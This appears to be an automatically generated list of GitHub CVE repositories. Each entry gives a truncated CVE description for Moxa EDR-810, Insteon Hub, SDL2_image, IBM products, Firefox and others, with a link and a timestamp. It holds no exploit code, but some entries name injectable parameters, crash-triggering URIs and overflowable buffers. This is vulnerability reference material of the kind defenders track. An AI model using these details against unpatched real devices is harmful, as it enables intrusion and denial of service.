**An exploitable Weak Cryptography for Passwords vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. An attacker could intercept weakly encrypted passwords and could brute force them. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12129](https://github.com/Live-Hack-CVE/CVE-2017-12129) create time: 2022-12-27T20:59:53Z

**An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the openvpnServer0_tmp= parameter in the "/goform/net\_Web\_get_value CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14432](https://github.com/Live-Hack-CVE/CVE-2017-14432) create time: 2022-12-27T20:59:49Z

**An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA\_CFG.ini" without a cookie header to trigger this vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14435](https://github.com/Live-Hack-CVE/CVE-2017-14435) create time: 2022-12-27T20:59:37Z

**A password storage vulnerability exists in the operating system functionality of Moxa EDR-810 V4.1 build 17030317. An attacker with shell access could extract passwords in clear text from the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12127](https://github.com/Live-Hack-CVE/CVE-2017-12127) create time: 2022-12-27T20:59:34Z

**An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12126](https://github.com/Live-Hack-CVE/CVE-2017-12126) create time: 2022-12-27T20:59:30Z

**An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the CN= parm in the "/goform/net_WebCSRGen" uri to trigger this vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12125](https://github.com/Live-Hack-CVE/CVE-2017-12125) create time: 2022-12-27T20:59:27Z

**An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12124](https://github.com/Live-Hack-CVE/CVE-2017-12124) create time: 2022-12-27T20:59:24Z

**An exploitable clear text transmission of password vulnerability exists in the web server and telnet functionality of Moxa EDR-810 V4.1 build 17030317. An attacker can look at network traffic to get the admin password for the device. The attacker can then use the credentials to login as admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12123](https://github.com/Live-Hack-CVE/CVE-2017-12123) create time: 2022-12-27T20:59:20Z

**An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA\_LOG.ini" without a cookie header to trigger this vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14437](https://github.com/Live-Hack-CVE/CVE-2017-14437) create time: 2022-12-27T20:59:17Z

**In the MMM::Agent::Helpers::Network::send_arp function in MySQL Multi-Master Replication Manager (MMM) mmm_agentd 2.2.1 (for Solaris), a specially crafted MMM protocol message can cause a shell command injection resulting in arbitrary command execution with the privileges of the mmm\_agentd process. An attacker that ca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14481](https://github.com/Live-Hack-CVE/CVE-2017-14481) create time: 2022-12-27T20:58:58Z

**An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA\_CFG2.ini" without a cookie header to trigger this vul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14436](https://github.com/Live-Hack-CVE/CVE-2017-14436) create time: 2022-12-27T20:58:55Z

**An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetmask0= parameter in the "/goform/net\_Web\_get_value" ur CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14434](https://github.com/Live-Hack-CVE/CVE-2017-14434) create time: 2022-12-27T20:58:51Z

**An exploitable code execution vulnerability exists in the ILBM image rendering functionality of SDL2_image-2.0.2. A specially crafted ILBM image can cause a stack overflow resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14440](https://github.com/Live-Hack-CVE/CVE-2017-14440) create time: 2022-12-27T20:58:48Z

**An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetwork0= parameter in the "/goform/net\_Web\_get_value" ur CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14433](https://github.com/Live-Hack-CVE/CVE-2017-14433) create time: 2022-12-27T20:58:45Z

**An exploitable code execution vulnerability exists in the ICO image rendering functionality of SDL2_image-2.0.2. A specially crafted ICO image can cause an integer overflow, cascading to a heap overflow resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14441](https://github.com/Live-Hack-CVE/CVE-2017-14441) create time: 2022-12-27T20:58:41Z

**An exploitable code execution vulnerability exists in the BMP image rendering functionality of SDL2_image-2.0.2. A specially crafted BMP image can cause a stack overflow resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14442](https://github.com/Live-Hack-CVE/CVE-2017-14442) create time: 2022-12-27T20:58:38Z

**An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01c368 the value for the s_mac key is copied using strcpy to the buffer at 0xa000170c. This buffer is 25 bytes large, sending anything longer will cause a buffer overflow. The destinat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16346](https://github.com/Live-Hack-CVE/CVE-2017-16346) create time: 2022-12-27T20:58:34Z

**An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01c318 the value for the s_port key is copied using strcpy to the buffer at 0xa00017f4. This buffer is 6 bytes large, sending anything longer will cause a buffer overflow. The destinat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16345](https://github.com/Live-Hack-CVE/CVE-2017-16345) create time: 2022-12-27T20:58:31Z

**An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01c224 the value for the s_vol_play key is copied using strcpy to the buffer at 0xa0000418. This buffer is maximum 8 bytes large (this is the maximum size it could be, it is possible o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16341](https://github.com/Live-Hack-CVE/CVE-2017-16341) create time: 2022-12-27T20:58:28Z

**An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01bb1c the value for the uri key is copied using strcpy to the buffer at 0xa00016a0. This buffer is 64 bytes large, sending anything longer will cause a buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16339](https://github.com/Live-Hack-CVE/CVE-2017-16339) create time: 2022-12-27T20:58:24Z

**An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01bad0 the value for the host key is copied using strcpy to the buffer at 0xa00016e0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16338](https://github.com/Live-Hack-CVE/CVE-2017-16338) create time: 2022-12-27T20:57:53Z

**On Insteon Hub 2245-222 devices with firmware version 1012, specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. At 0x9d01ef24 the value for the s_offset key is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16337](https://github.com/Live-Hack-CVE/CVE-2017-16337) create time: 2022-12-27T20:57:50Z

**An exploitable buffer overflow vulnerability exists in the PubNub message handler Insteon Hub 2245-222 - Firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can send an authenticated HTTP request at At 0x9d014e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16255](https://github.com/Live-Hack-CVE/CVE-2017-16255) create time: 2022-12-27T20:57:46Z

**An exploitable buffer overflow vulnerability exists in the PubNub message handler Insteon Hub 2245-222 - Firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can send an authenticated HTTP request at 0x9d014e4c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16254](https://github.com/Live-Hack-CVE/CVE-2017-16254) create time: 2022-12-27T20:57:43Z

**An exploitable buffer overflow vulnerability exists in the PubNub message handler Insteon Hub 2245-222 - Firmware version 1012 for the cc channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16253](https://github.com/Live-Hack-CVE/CVE-2017-16253) create time: 2022-12-27T20:57:40Z

**Specially crafted commands sent through the PubNub service in Insteon Hub 2245-222 with firmware version 1012 can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability.At 0x9d014cc0 the value for the cmd key is copied using st CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16252](https://github.com/Live-Hack-CVE/CVE-2017-16252) create time: 2022-12-27T20:57:36Z

**In the MMM::Agent::Helpers::Network::clear_ip function in MySQL Multi-Master Replication Manager (MMM) mmm_agentd 2.2.1 (for FreeBSD), a specially crafted MMM protocol message can cause a shell command injection resulting in arbitrary command execution with the privileges of the mmm\_agentd process. An attacker that ca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14480](https://github.com/Live-Hack-CVE/CVE-2017-14480) create time: 2022-12-27T20:57:33Z

**In the MMM::Agent::Helpers::Network::clear_ip function in MySQL Multi-Master Replication Manager (MMM) mmm_agentd 2.2.1 (for Solaris), a specially crafted MMM protocol message can cause a shell command injection resulting in arbitrary command execution with the privileges of the mmm\_agentd process. An attacker that ca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14479](https://github.com/Live-Hack-CVE/CVE-2017-14479) create time: 2022-12-27T20:57:29Z

**Kernel/VM/MemoryManager.cpp in SerenityOS before 2019-12-30 does not reject syscalls with pointers into the kernel-only virtual address space, which allows local users to gain privileges by overwriting a return address that was found on the kernel stack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20172](https://github.com/Live-Hack-CVE/CVE-2019-20172) create time: 2022-12-27T21:06:58Z

**In xml.rs in GNOME librsvg before 2.46.2, a crafted SVG file with nested patterns can cause denial of service when passed to the library for processing. The attacker constructs pattern elements so that the number of final rendered objects grows exponentially. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20446](https://github.com/Live-Hack-CVE/CVE-2019-20446) create time: 2022-12-27T21:03:27Z

**sysstat through 12.2.0 has a double free in check_file_actlst in sa_common.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19725](https://github.com/Live-Hack-CVE/CVE-2019-19725) create time: 2022-12-27T21:03:23Z

**sysstat before 12.1.6 has memory corruption due to an Integer Overflow in remap_struct() in sa_common.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16167](https://github.com/Live-Hack-CVE/CVE-2019-16167) create time: 2022-12-27T21:03:20Z

**Digital Alert Systems’ DASDEC software prior to version 4.1 contains a cross-site scripting (XSS) vulnerability that allows remote attackers to inject arbitrary web script or HTML via the SSH username, username field of the login page, or via the HTTP host header. The injected content is stored in logs and rendered whe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18265](https://github.com/Live-Hack-CVE/CVE-2019-18265) create time: 2022-12-27T21:00:40Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 and 6.0.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 157109 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4075](https://github.com/Live-Hack-CVE/CVE-2019-4075) create time: 2022-12-27T20:24:53Z

**IBM Cognos Controller 10.2.0, 10.2.1, 10.3.0, 10.3.1, and 10.4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158332 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4136](https://github.com/Live-Hack-CVE/CVE-2019-4136) create time: 2022-12-27T20:24:50Z

**IBM Security Access Manager 9.0.1 through 9.0.6 is affected by a security vulnerability that could allow authenticated users to impersonate other users. IBM X-Force ID: 158331. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4135](https://github.com/Live-Hack-CVE/CVE-2019-4135) create time: 2022-12-27T20:23:51Z

**IBM Jazz Foundation products (IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trust CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4083](https://github.com/Live-Hack-CVE/CVE-2019-4083) create time: 2022-12-27T20:23:47Z

**IBM Jazz Foundation products (IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1) could allow an authenticated user to obtain sensitive information from CLM Applications that could be used in further attacks against the system. IBM X-Force ID: 157384. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4084](https://github.com/Live-Hack-CVE/CVE-2019-4084) create time: 2022-12-27T20:23:44Z

**IBM Planning Analytics 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158281. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4134](https://github.com/Live-Hack-CVE/CVE-2019-4134) create time: 2022-12-27T20:23:30Z

**IBM Cloud Application Performance Management 8.1.4 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the vict CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4086](https://github.com/Live-Hack-CVE/CVE-2019-4086) create time: 2022-12-27T20:23:23Z

**IBM WebSphere eXtreme Scale 8.6 Admin API is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158113. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4115](https://github.com/Live-Hack-CVE/CVE-2019-4115) create time: 2022-12-27T20:23:16Z

**IBM WebSphere eXtreme Scale 8.6 Admin Console could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. I CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4109](https://github.com/Live-Hack-CVE/CVE-2019-4109) create time: 2022-12-27T20:23:13Z

**IBM WebSphere eXtreme Scale 8.6 Admin Console allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 158105. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4112](https://github.com/Live-Hack-CVE/CVE-2019-4112) create time: 2022-12-27T20:22:58Z

**IBM WebSphere eXtreme Scale 8.6 Admin Console is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158099. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4106](https://github.com/Live-Hack-CVE/CVE-2019-4106) create time: 2022-12-27T20:22:55Z

**IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow malicious user with access to the DB2 instance account to leverage a fenced execution process to execute arbitrary code as root. IBM X-Force ID: 156567. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4057](https://github.com/Live-Hack-CVE/CVE-2019-4057) create time: 2022-12-27T20:19:16Z

**IBM Spectrum Protect Servers 7.1 and 8.1 and Storage Agents are vulnerable to a stack-based buffer overflow, caused by improper bounds checking by servers and storage agents in response to specifically crafted communication exchanges. By sending an overly long request, a remote attacker could overflow a buffer and exec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4087](https://github.com/Live-Hack-CVE/CVE-2019-4087) create time: 2022-12-27T20:19:13Z

**In SQLite 3.31.1, there is an out of bounds access problem through ALTER TABLE for views that have a nested FROM clause. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35527](https://github.com/Live-Hack-CVE/CVE-2020-35527) create time: 2022-12-27T21:02:46Z

**The LearnPress plugin before 3.2.6.9 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11511](https://github.com/Live-Hack-CVE/CVE-2020-11511) create time: 2022-12-27T20:20:13Z

**SerenityOS Unspecified is affected by: Buffer Overflow. The impact is: obtain sensitive information (context-dependent). The component is: /Userland/Libraries/LibCrypto/ASN1/DER.h Crypto::der_decode_sequence() function. The attack vector is: Parsing RSA Key ASN.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27343](https://github.com/Live-Hack-CVE/CVE-2021-27343) create time: 2022-12-27T21:06:24Z

**SerenityOS 2021-03-27 contains a buffer overflow vulnerability in the EndOfCentralDirectory::read() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30045](https://github.com/Live-Hack-CVE/CVE-2021-30045) create time: 2022-12-27T21:06:20Z

**IBM Security Guardium 10.5, 10.6, 11.0, 11.1, 11.2, 11.3, and 11.4 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 215587. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39077](https://github.com/Live-Hack-CVE/CVE-2021-39077) create time: 2022-12-27T21:04:50Z

**CKEditor4 is an open source WYSIWYG HTML editor. In affected versions a vulnerability has been discovered in the Advanced Content Filter (ACF) module and may affect all plugins used by CKEditor 4. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41164](https://github.com/Live-Hack-CVE/CVE-2021-41164) create time: 2022-12-27T21:03:45Z

**In Mbed TLS before 2.28.0 and 3.x before 3.1.0, psa_cipher_generate_iv and psa_cipher_encrypt allow policy bypass or oracle-based decryption when the output buffer is at memory locations accessible to an untrusted application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45450](https://github.com/Live-Hack-CVE/CVE-2021-45450) create time: 2022-12-27T21:03:41Z

**OWASP ModSecurity Core Rule Set 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.2 is affected by a Request Body Bypass via a trailing pathname. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35368](https://github.com/Live-Hack-CVE/CVE-2021-35368) create time: 2022-12-27T21:03:34Z

**GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43618](https://github.com/Live-Hack-CVE/CVE-2021-43618) create time: 2022-12-27T21:03:30Z

**A use-after-free read flaw was found in sock_getsockopt() in net/core/sock.c due to SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect()) in the Linux kernel. In this flaw, an attacker with a user privileges may crash the system or leak internal kernel information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4203](https://github.com/Live-Hack-CVE/CVE-2021-4203) create time: 2022-12-27T21:03:16Z

**In Mbed TLS before 3.1.0, psa_aead_generate_nonce allows policy bypass or oracle-based decryption when the output buffer is at memory locations accessible to an untrusted application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45451](https://github.com/Live-Hack-CVE/CVE-2021-45451) create time: 2022-12-27T21:03:09Z

**Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.42 and 4.0.2, template authors could run arbitrary PHP code by crafting a malicious math string. If a math string was passed through as user provided data to the math function, exter CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29454](https://github.com/Live-Hack-CVE/CVE-2021-29454) create time: 2022-12-27T21:03:05Z

**Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.43 and 4.0.3, template authors could run restricted static php methods. Users should upgrade to version 3.1.43 or 4.0.3 to receive a patch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21408](https://github.com/Live-Hack-CVE/CVE-2021-21408) create time: 2022-12-27T21:03:02Z

**A key length flaw was found in Red Hat Ceph Storage. An attacker can exploit the fact that the key length is incorrectly passed in an encryption algorithm to create a non random key, which is weaker and can be exploited for loss of confidentiality and integrity on encrypted disks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3979](https://github.com/Live-Hack-CVE/CVE-2021-3979) create time: 2022-12-27T21:02:08Z

**The cgi gem before 0.1.0.2, 0.2.x before 0.2.2, and 0.3.x before 0.3.5 for Ruby allows HTTP response splitting. This is relevant to applications that use untrusted user input either to generate an HTTP response or to create a CGI::Cookie object. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33621](https://github.com/Live-Hack-CVE/CVE-2021-33621) create time: 2022-12-27T20:57:08Z

**Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44228](https://github.com/Live-Hack-CVE/CVE-2021-44228) create time: 2022-12-27T20:57:04Z

**Documents loaded with the CSP sandbox directive could have escaped the sandbox's script restriction by embedding additional content. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Firefox < 95. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43543](https://github.com/Live-Hack-CVE/CVE-2021-43543) create time: 2022-12-27T20:24:01Z

**Using the Location API in a loop could have caused severe application hangs and crashes. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Firefox < 95. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43545](https://github.com/Live-Hack-CVE/CVE-2021-43545) create time: 2022-12-27T20:23:58Z

**An incorrect type conversion of sizes from 64bit to 32bit integers allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Firefox < 95. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43537](https://github.com/Live-Hack-CVE/CVE-2021-43537) create time: 2022-12-27T20:23:41Z

**The iframe sandbox rules were not correctly applied to XSLT stylesheets, allowing an iframe to bypass restrictions such as executing scripts or navigating the top-level frame. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38503](https://github.com/Live-Hack-CVE/CVE-2021-38503) create time: 2022-12-27T20:23:37Z

**Due to an unusual sequence of attacker-controlled events, a Javascript alert() dialog with arbitrary (although unstyled) contents could be displayed over top an uncontrolled webpage of the attacker's choosing. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38509](https://github.com/Live-Hack-CVE/CVE-2021-38509) create time: 2022-12-27T20:23:33Z

**The ElGamal implementation in Botan through 2.18.1, as used in Thunderbird and other products, allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40529](https://github.com/Live-Hack-CVE/CVE-2021-40529) create time: 2022-12-27T20:23:27Z

**When interacting with an HTML input element's file picker dialog with webkitdirectory set, a use-after-free could have resulted, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38504](https://github.com/Live-Hack-CVE/CVE-2021-38504) create time: 2022-12-27T20:23:19Z

**Thunderbird unexpectedly enabled JavaScript in the composition area. The JavaScript execution context was limited to this area and did not receive chrome-level privileges, but could be used as a stepping stone to further an attack with other vulnerabilities. This vulnerability affects Thunderbird < 91.4.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43528](https://github.com/Live-Hack-CVE/CVE-2021-43528) create time: 2022-12-27T20:22:51Z

**Through a series of navigations, Firefox could have entered fullscreen mode without notification or warning to the user. This could lead to spoofing attacks on the browser UI including phishing. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38506](https://github.com/Live-Hack-CVE/CVE-2021-38506) create time: 2022-12-27T20:22:43Z

**By displaying a form validity message in the correct location at the same time as a permission prompt (such as for geolocation), the validity message could have obscured the prompt, resulting in the user potentially being tricked into granting the permission. This vulnerability affects Firefox < 94, Thunderbird < 91.3, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38508](https://github.com/Live-Hack-CVE/CVE-2021-38508) create time: 2022-12-27T20:22:09Z

**Using XMLHttpRequest, an attacker could have identified installed applications by probing error messages for loading external protocols. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Firefox < 95. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43542](https://github.com/Live-Hack-CVE/CVE-2021-43542) create time: 2022-12-27T20:22:06Z

**Under certain circumstances, asynchronous functions could have caused a navigation to fail but expose the target URL. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Firefox < 95. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43536](https://github.com/Live-Hack-CVE/CVE-2021-43536) create time: 2022-12-27T20:20:52Z

**The Opportunistic Encryption feature of HTTP2 (RFC 8164) allows a connection to be transparently upgraded to TLS while retaining the visual properties of an HTTP connection, including being same-origin with unencrypted connections on port 80. However, if a second encrypted port on the same IP address (e.g. port 8443) d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38507](https://github.com/Live-Hack-CVE/CVE-2021-38507) create time: 2022-12-27T20:20:48Z

**Failure to correctly record the location of live pointers across wasm instance calls resulted in a GC occurring within the call not tracing those live pointers. This could have led to a use-after-free causing a potentially exploitable crash. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Fir CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43539](https://github.com/Live-Hack-CVE/CVE-2021-43539) create time: 2022-12-27T20:20:45Z

**By misusing a race in our notification code, an attacker could have forcefully hidden the notification for pages that had received full screen and pointer lock access, which could have been used for spoofing attacks. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Firefox < 95. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43538](https://github.com/Live-Hack-CVE/CVE-2021-43538) create time: 2022-12-27T20:20:41Z

**Redmine 5.x before 5.0.4 allows downloading of file attachments of any Issue or any Wiki page due to insufficient permission checks. Depending on the configuration, this may require login as a registered user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44030](https://github.com/Live-Hack-CVE/CVE-2022-44030) create time: 2022-12-27T21:06:17Z

**An unauthenticated attacker can cause a denial-of-service to the following products: Ivanti Connect Secure (ICS) in versions prior to 9.1R14.3, 9.1R15.2, 9.1R16.2, and 22.2R4, Ivanti Policy Secure (IPS) in versions prior to 9.1R17 and 22.3R1, and Ivanti Neurons for Zero-Trust Access in versions prior to 22.3R1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35254](https://github.com/Live-Hack-CVE/CVE-2022-35254) create time: 2022-12-27T21:06:13Z

**The llhttp parser in the http module in Node v18.7.0 does not correctly handle header fields that are not terminated with CLRF. This may result in HTTP Request Smuggling. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35256](https://github.com/Live-Hack-CVE/CVE-2022-35256) create time: 2022-12-27T21:06:10Z

**Rapid Software LLC Rapid SCADA 5.8.4 is vulnerable to Cross Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44153](https://github.com/Live-Hack-CVE/CVE-2022-44153) create time: 2022-12-27T21:06:06Z

